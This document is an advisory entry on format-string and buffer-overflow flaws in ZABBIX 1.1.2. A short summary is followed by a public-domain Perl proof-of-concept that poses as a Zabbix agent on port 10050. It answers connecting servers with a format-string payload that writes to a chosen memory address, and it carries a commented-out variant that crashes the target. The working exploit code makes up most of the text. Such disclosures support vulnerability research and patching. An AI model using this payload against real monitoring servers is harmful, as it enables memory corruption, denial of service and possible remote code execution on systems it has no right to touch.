source: https://www.securityfocus.com/bid/20416/info
ZABBIX is prone to multiple unspecified remote code-execution vulnerabilities.
Reports indicate that these issues facilitate format-string and buffer-overflow attacks. A remote attacker may leverage these vulnerabilities to trigger denial-of-service conditions or to execute arbitrary code to gain unauthorized access to a vulnerable computer. This would occur in the context of the application.
ZABBIX version 1.1.2 is reported vulnerable; other versions may be affected as well.
#!/usr/bin/perl --
# zabbix-exploiter
# by Ulf Harnhammar in 2006
# I hereby place this program in the public domain.
use IO::Socket;
$server = IO::Socket::INET->new( Proto => 'tcp',
LocalPort => 10050,
Listen => SOMAXCONN,
Reuse => 1);
die "can't create server\n" if !$server;
while ($client = $server->accept())
{
$client->autoflush(1);
$key = <$client>; print $key;
print $client 'UUUU%16$n'; # writes data to 0x55555555, at least on Debian testing
# print $client '%n%n%n%n'; # crashes
close $client;
}